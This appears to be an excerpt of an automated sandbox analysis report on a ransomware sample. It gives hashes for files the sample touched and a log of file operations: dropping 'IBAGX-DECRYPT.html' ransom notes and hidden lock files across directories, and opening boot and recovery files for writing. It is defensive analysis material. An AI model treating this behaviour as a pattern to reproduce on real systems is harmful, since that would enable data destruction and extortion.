C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol 0.81 KB MD5: d7ff79a732a1d62b5319457801096e04
SHA1: 3d4eed2e06da601457b2d724c2021c1e99f0e2c4
SHA256: b66a3564ade63ff97fdf00ac9180a4c8a4330b43a92f558f12b7bfb848a9a06f
SSDeep: 12:tOQgrPxCeRFOTE26DvsC2AfE8D46Me5eujdHQ1G1AKGeQcjtwp5yShNEAsf123wv:0pvEAc8d5eedHQ15PAWhSAMAA3eHCX
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm 0.76 KB MD5: f50f7419f49ffaa8aa2291f31e572bbb
SHA1: ff809bb4958916967c6b958d7b9b7b98dac922c1
SHA256: 51188af708beb749205928e42358a0d9801b662708d04ca0170d72cdc91931e0
SSDeep: 12:sdHxFDwadzT6czwmkKNrYUbk5mICQejlQoxion8UU0izLb+gcdlZTv4XmVyMvqSC:sdRFN5RUm5F7lQosoupsZ8WgMA
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log 2.00 MB MD5: d93a44e501e5c3cc2b6937c1d3d0168f
SHA1: 267aabbff3225cb6ae478491eebbf5462cf7cb17
SHA256: b569508d9f685853740ac5aca5be27139763edcc70eb7b36236572f3635bf5b9
SSDeep: 49152:shxJziMmsyUbifkB1MLqQZ1eoP8PjbamOTkHul2C1/h0myXv:exxiMaUeMDMLqQjeokPjFmkHHCBz4v
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg 6.76 KB MD5: 3e9d681cc8eeb716b55d08fe17756d11
SHA1: b1a2df0cdcb4976a3b5be33686ffdd48df21c4eb
SHA256: f8ec0d873d4e374a7e8fada6224bc7f52140a5c270257f155b5237295c488f68
SSDeep: 192:jh5QKTEtos75LYXdIVfddOZ+3YiBYiAA2K4/A5E:F5QKTEtoKsNwTeGuJ/SE
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl 1.31 KB MD5: 42d63b1f0bafbe255569b5ec52570c15
SHA1: ed28d34c1ff4574c722b5e0d5e67fba96c52ad61
SHA256: cf4b0ae5065f1ffce3fb80ec4003a4ed4dc90ab3b94c1ff69d256456126a5bb2
SSDeep: 24:JBBHK9kjveXV5Qm7gGPFgsMoQXCh/wnLF0Edhj+wY5rKwglVUbl:fBq9kr07Qm7Z/3Q5LBqrHglVYl
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs 2.00 MB MD5: c0104241ff99983b2634b150f29effb7
SHA1: e6f64bfaa399f1c49d3fd68fab1b45b7f09b5cbd
SHA256: 340ee7b49035d2a8269e9de3c9965407e67c7f7a726b85e0a987cf454fa6929f
SSDeep: 24576:kSnPI2XPx+FNm2H2T/E770JlJe3WYB7QUDEqQfmhFl/RS:hnP5kFovaSG3smhDRS
False
C:\Users\Default\Favorites\Links\Web Slice Gallery.url 0.75 KB MD5: e6fa0249ab3444a15f4a8dd11986b109
SHA1: c6466b1076f94801f57429e97bba6440ed6790f9
SHA256: e876fa7e8e53bb516218fc70b7861cbe9d9a016458311f031d21b0bfb7b3ca94
SSDeep: 12:I/Pf9Eg/qCRIi3fLJ5uZQCo0vmt0fwweAXN/citP6f/mM36qXCivVg3ItoI6BFyd:IP9v9Ii3dy2Dt04Tm63mo6Kd9g4toxFy
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl 37.35 KB MD5: 8292e61691a7abfb88b484d37b445484
SHA1: e494eb83aecb03b58f1867d1165383369a8398af
SHA256: dca89b31d2656bdba4ea7cce89d61b88f13d11b2eb3118d9896ee6b7a198c85a
SSDeep: 768:rpmlCq5ybvJkyiNgNeVbMwNUcZjmquZx8O4bsBgtWSJ+UEFtz:9I/5KJcg2bZvKqE4ztWSUU+
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url 0.66 KB MD5: 25da10502e6c2ccebb32467fc8493819
SHA1: a616b9eedea23d2fd02270141c5235cedd0f8ac4
SHA256: 2f64ee5a208e66ff874cc9d06770a947e565b73ab6af69538db713042836ca13
SSDeep: 12:sKeLQ17gXbWJiCZiO4e+QdMUVhO66ej1mJPydjFgKCzS26LTM/Ofyw1EC:sKeLdbUiCSWOa6ej1mRydjFgKZnMcywH
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\83aa4cc77f591dfc2374580bbd95f6ba_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb 0.57 KB MD5: 3381646a049e590114f7679de8f12dde
SHA1: 5984e6a5fe312bdb906f128ba6afde6817c9b6e0
SHA256: 01ffb95b44214dcceab33a6b2b887d6abd454ca899b527be135c8dcc254d05ac
SSDeep: 12:TCmoN8O/rc/2pLJrAvF+ZNUw3iBK+PkRtdMpsxeCB3M6FE3pIuHmhyC:sN3hJrkiCCT3zypU6GEhmJ
False
C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD 1.01 KB MD5: d186b0ff13789fd47dbfcf8e8684581a
SHA1: 4ca91c3dca2649206857ed1d21efe13458ce71ca
SHA256: 9866d21596d33a6b957cb3be3dd74d681ac3dfd4d23185266309d32760508365
SSDeep: 24:0lLHcEHyXNeHvrf/PuBU2I5Cw7OZjKzA77c8VN41GyfVwT7s5qQMA6XSWNtS8qhf:0l7tyIkGnOZOzU7c8D4IwVQ7s4pvS7h
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\id[1].xml 0.61 KB MD5: 7cb7490f85e987a464dc83bec18e7f2e
SHA1: 56de93d0326cea37deef2a8fad32fc719323dbe1
SHA256: d6fcf9c8e14009381ae034b9c69996d9f6a7dfae4301f53f5d8d865ff694c2bb
SSDeep: 12:mMqe6GI0v0D/RP0AORKhChOlhP0N7rmHcVCGzZMHMZdxQTlQODSNDsMcE30FMC:B3tJv0V8lRKUhe8tMJGzZ+MuTO99y
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl 1.76 KB MD5: 7132af5b0bbd7e790601856580991fed
SHA1: 53efa04ec35d36bc074698e0e8746417a3eb18a9
SHA256: a5fe2cffbbe64ef0a203f63ee164730ec741cdadcb47ced6af5e1f9867de0e8a
SSDeep: 48:yvrftDztCzUX1ZbJ3ws0IJnEfov86JL3+N:aFzgwlZbqUZdRJqN
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg 23.84 KB MD5: e16410bf598e90d136c8fd6b2009f3b9
SHA1: 134dfc47220bb0a3ffeb396440532fdf5fb187bb
SHA256: 77387dae9ab0ccf9fcfb30f301ec51283e78db7a1739fb393ebc9947a22655f2
SSDeep: 384:rbymG6JmxVDleTx2TDoFPChbAg2lkr4NEwkWdVacA6eSBJH9Fkne+JUEP9k:fExVRwqUz7ker26em5EP9k
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa 0.98 KB MD5: c24dc758d109c74a498a029acb1bbbee
SHA1: ff52f5d140ceeb16a4b11ecf132f714f13451b39
SHA256: 49a48260d08e9dab1e8b2f81350f66bf24b0281a7e795b2379a756a92022ea44
SSDeep: 24:MTTON5BNU3RgDDGdPomXXxwrh3As5KO4gW+A:MTTOnUhgDcXXS5MMA
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms 28.53 KB MD5: 983b63593e2497ce3a7c1c6acc6530b6
SHA1: 6778043df7ae369b1d5d88612a9b8c1b9e42398a
SHA256: f014b95ba7d2251ff9fec2943fc78a768055bf06ea420cbb6b2e45d575b5ab32
SSDeep: 384:LyRpz7TtA+46zSazcyDFsItTlUb3sQ2okpBFTIqxJiNfsuBA2cWEYSxTOFn6Ctej:LeTe+46zSyRDFs13sQC/6qftcn6seBqS
False
C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url 0.66 KB MD5: 964edd71f5e8132944d4ca011352a5ce
SHA1: 9b8a3c9e16c10178b721b07cc6403e9cdcc1ffa7
SHA256: 02d0d8952700d264e5c2d2f045466330153eeb9d18b34eb6ddfddc3e6544cb04
SSDeep: 12:SqOtVMtJVUPV7swliaNyajB148UO8aGlD6kp6AvsiqKb0nBNMb580C:gwtb4lXyROYl+koAvsiqKb0nQNK
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg 5.15 KB MD5: c1e1fcab20d7bd44d6d72131347f3c60
SHA1: 293030b9fd329952178621a7bbf2e75dd9fcf250
SHA256: eea85711929d0b7f4bfe57e04176a6f4faceb9f7e53fb481b25802c9b99de2a0
SSDeep: 96:hGa8d1THTKTDIt8MYwutwRrse2RpEAP47TqtYDTHBJuxe5ZthCjI+4RXFR2:h98jTzqD7MYVRpErKWDTtajIxr2
False
C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg 66.80 KB MD5: b31697b470f048e7a38b4ba63da7dbcf
SHA1: 0783308ae45ee96a12075495860b3ec4ed670b40
SHA256: 079c0aa865846e5059a8171690381bd14f6864f0f4f9a6f2b5ea5964563f2322
SSDeep: 1536:bq7yJw/Mm8idRSPzTvuhnglQ7BkfpM3LU9qyDl0NY:bwODifGEnaEst0NY
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg 5.52 KB MD5: 7ae6a28d22c40f09fb4e06c67ade9d42
SHA1: 127ccb4c3534845d1d0769039c3ad37b0a7c1219
SHA256: a833c9c8c60c9efce614f390f33c4bf6e9a5cdd4aa6f1cec5378d6e7a1b95d77
SSDeep: 96:HJDyYnZcMjK2vjdShq3olGW/tG0J0QXolQB57oAdmLtesmyKLZQCaI88k:HJhnKx2hSIo1/cy0QXoCYRpKLeCp88k
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore 2.02 MB MD5: 8d9715387a37982ff707e813b019340a
SHA1: 0c1113a839b265fa507710494f7dbf36d5c0b10a
SHA256: 102e5bc9c4273310511db779bf211f7add298d1c7a17a076f82676042c0e9a89
SSDeep: 24576:AhRk5Cl7e/ge9Y5ZLWX5W+KhdVpmXgZBF5aKsK2cBti9WCPTuT:AeCl77Nt6w55aKnIWETuT
False
C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt 12.43 KB MD5: 204bd85c5d5a4f4b30067734169a9160
SHA1: 1a7e257028c91b04f34dda4b1aad34231a3e61d4
SHA256: 7b714e635a095e1b658693ab91e4884236efe2cde5f2ed814956a2ac88284d6c
SSDeep: 192:1V6l/+f3ti5wb7wcjxFwlCcEl1VuH17eFJa2bo1pb9hQh/l8AVj:1Y9+ftswbscjx+rELVuIjZbo1pvQpOQj
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms 512.53 KB MD5: 0ca864764ea59ad67650cc9c58172d5b
SHA1: 1ff6954e5369386f488dc3ae7d7d306bb373a1f0
SHA256: f291bf29dde2fe376cb62f8c77754c75a326d38d3da4fd5cdc01c017a4b48a1c
SSDeep: 12288:W0r8kAYS+oQUPU0YyGyB0AkLg2lW7i9IKGURydp:WK8tYlU80YJPLE7irGUR2p
False
C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini 0.61 KB MD5: 4635cdafdc6e74980c791aec3bb543db
SHA1: 367d620da7b1daacd3b2d10fee6e1b9e14e2ae97
SHA256: e47a989a468ce6d8ac7fb2364a61ef8a484f2de4d1b960e581f52f3570b25d78
SSDeep: 12:ALw0mFuazsukfZhEVyvQjrZTg2Ub5/aYoKBEK59FBW/1O+ooU++7BgC:ALVyubu2Z6q8TghVouEK59Fc/1uoU+i
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm 0.75 KB MD5: d0be0685c6415a2b8726dd0e02c9b08b
SHA1: 5353af159b943956eac2f89a3499267f40d60497
SHA256: e3b237e5a07d4ffd4c74a4d0ed717624d5efad3537aff005a0ad74c0de7b3b71
SSDeep: 12:YJ9baak8onyhg+0E662CMnfiSZtCH+4LvbFWgCwC:YJ9btkbnyh2OP+sIPJ
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat 32.53 KB MD5: 6d25d007f79e1b32d5063aaf34a5bd79
SHA1: f3b12233223c74d1e4c0baeab91f97897ee1d75c
SHA256: 2abe4bf5f4a7f49d294fe5302346f86b2fecc375bbb69637329f840887c1f859
SSDeep: 768:W3iTd2w2lxeUyxtQf0BB8mwnb0ptdE4EGl4nmP:W3iTd2wuixhwnb0jq4dl4nmP
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl 1.44 KB MD5: bbd1023423e5973cf94b68d1f691212b
SHA1: b72e21129596b54d157be7337c063a44ab55ce33
SHA256: adcf93f66ba743486bd400817b9a81dafe52aa5dbd7325dbd938df4cd0fc3b56
SSDeep: 24:GE5pcSrRCo5H4ylxH4a1sp5psoQ1ymwdPpIQYsxeOzMR97PXp/tN//t9OoJtEdPZ:Pfco5YIxYa91ymwdOjs5zMRBxlB14IOH
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx 3.99 MB MD5: ef304750860074dfca21b97f76ad5d24
SHA1: 3cc6620133f46a212b8a9776382b0fc0c35cab71
SHA256: a2138977fffad2c4aabf46b62d9d5028a5f9e1f9bb7baff99070238560b4472f
SSDeep: 98304:T+BJn651h+s8aa8NHLBvUaylef22P5xGM0p:KE51h5XKaywz5czp
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml 0.78 KB MD5: 87d0679daf9dd12201706f6377521ba4
SHA1: 89eefc1f2127034b18d0829f800a38c3ba6daab7
SHA256: f12c53b705e0f3fa0e92803d214a872ad5d395ffcfba16cacd23e1e25c8e0e10
SSDeep: 24:aJjtCrVCY0TlZRQj/RdIXU1Zf2z1Pyl8l:aJ5CrIhnKzRdYUZOkI
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log 2.00 MB MD5: 129c9e124c4143a8de67919f43d79172
SHA1: 769296b7b61575411560016733efc64179ffed24
SHA256: aa7f16324adf732f55afb5e01f7437851a947ef5a2655a376ff1b18f4c62ae67
SSDeep: 49152:1ynDFTGvXDIkOodrwMXuqs6/assXHBDYZStH4Yg6:1q5QXD5tHXuqsFsApIG3
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk 8.53 KB MD5: 9ecfc5931a92f3f9942b8503a33bad15
SHA1: f333f5d0d0e9f5c1bfb9f66596a883e72e3bac06
SHA256: 9a89dab1740dfb9639fc8bd281c456fa4e626b221a743e7e72d11c1597c747b5
SSDeep: 192:oNUfYmGExmO9tZjWm0f6z96eaGjKf+5ZNHkJ4k5gSXWjvk:0GYDyrp50Cz8eHjDIJ41js
False
C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4 30.24 KB MD5: b3d4c8991947180a27a11b5fab3ac046
SHA1: 27b4521a49325c82c6296ecc8b99533bd15d4064
SHA256: 4e4e5e6d96fa53e5e29940712ef90a6ea288ef9ab4ba22b298fcc676510f9511
SSDeep: 768:9zGHHstAWE0veo/k7D5RetuJo/YUVOM3uAXWP:btLE0Go+1svQUb3uAXM
False
C:\Users\Default\Favorites\Windows Live\Get Windows Live.url 0.66 KB MD5: a45c6c54dfc4a3191c4c4b1143a99aea
SHA1: 1ec94b42d655d36852f34b1f548e122dce553807
SHA256: c30cb8b0676fae3b67be5ba1d455c1d937e2e62ac75c464a8448dc4c93113e0f
SSDeep: 12:qN0bCd1gzv3WbyH2NddCyvLmEoEasOkN7pw328dxQHNUAdwq1C:7Czs3oyWLdCyvSAaTkI32bHquM
False
C:\Users\EEBsYm5\AppData\Roaming\d9-2p9zLf4.pdf 37.41 KB MD5: db8e8a7fc6587329fd2fd21d376a96be
SHA1: 25506e96a4e6b76861735af3a8575e312be005db
SHA256: bfd963b2bd4a44d1585ac6ed62165c9d382723e48207b9da8ae83743779e2d63
SSDeep: 768:8YFmIFpevuLLoVZ26FsArd+1HCqSmFEoM+VG7OluYvQAIYeoqNvRmZQ:8YVFAvuAVZjyA0RCd7qaouYY6e7Nv0m
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat 16.53 KB MD5: 7b3bf4d1ee365be20279a24ff71f4fa4
SHA1: 9e49d881cbb08480411d3e18d1e1c9f90a41c13a
SHA256: a6a2c0ee170825aebb72a7a70eb6939bb8d30cd385d5472587dd40b53fe479a6
SSDeep: 384:0yc9u8Ar2E3pXnCqnsbkX8iszuKVM5tAeKfU1iJ6K0O:SU8GHnDXAzuKVQbKfUIJv0O
False
C:\Users\EEBsYm5\AppData\Roaming\du-5F19JYW5jR0wN.png 66.05 KB MD5: abee6d05cfd94261da2f80dd22be8197
SHA1: 1c5760a163d09e5aa405e0d1d46846a1e874976f
SHA256: 3f33558f9bd359cd93411ac666bb41762553a660de86657144929c8de39b19a2
SSDeep: 1536:e38gUDClglpRZ8+lNriAYZq1jmEajUTV95q0czvvLf/0KkXIZS:slUDVZDHi7ZqFtx+xlcIk
False
C:\Users\Default\Favorites\MSN Websites\MSN.url 0.66 KB MD5: 1aaf4cce89bb026ab2861aa8b79e0347
SHA1: d9c5bdb86e063cfda4be1fd300398c960ee9ddbe
SHA256: f99fea69d61b7e8b6810d47f722a244903254a1dcb07bd7ac2615405945795eb
SSDeep: 12:yIvbpzin+5GMGXxkE87YuNeKn91EuvrDQ/dTSD6r0BRZmI3Z5CYks2mk0C:yIvNzi3i17H/91vnwdTSmrIpp5CJsLkt
False
Host Behavior
File (2729)
Operation | Filename | Additional Information | Success | Count | Logfile
Create | C:\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 | Fn
Create | C:\$Recycle.Bin\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\$Recycle.Bin\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 | Fn
Create | C:\$Recycle.Bin\S-1-5-21-3785418085-2572485238-895829336-1000\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\$Recycle.Bin\S-1-5-21-3785418085-2572485238-895829336-1000\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 | Fn
Create | C:\bootmgr | desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH | False | 1 | Fn
Create | C:\bootmgr | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH | False | 1 | Fn
Create | C:\Documents and Settings\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\Documents and Settings\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 | Fn
Create | C:\MSOCache\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\MSOCache\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 | Fn
Create | C:\PerfLogs\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\PerfLogs\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 | Fn
Create | C:\PerfLogs\Admin\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\PerfLogs\Admin\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 | Fn
Create | C:\Program Files\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\Program Files\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 | Fn
Create | C:\Program Files\Microsoft SQL Server Compact Edition\\IBAGX-DECRYPT.html | desired_access = GENERIC_WRITE | True | 1 | Fn
Create | C:\Program Files\Microsoft SQL Server Compact Edition\90c08d8190c08a69610.lock | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE | True | 1 |
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Recovery\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Recovery\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\System Volume Information\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\System Volume Information\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Create C:\Users\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Create C:\Users\Default\AppData\Local\History\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\History\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Credentials\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Credentials\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
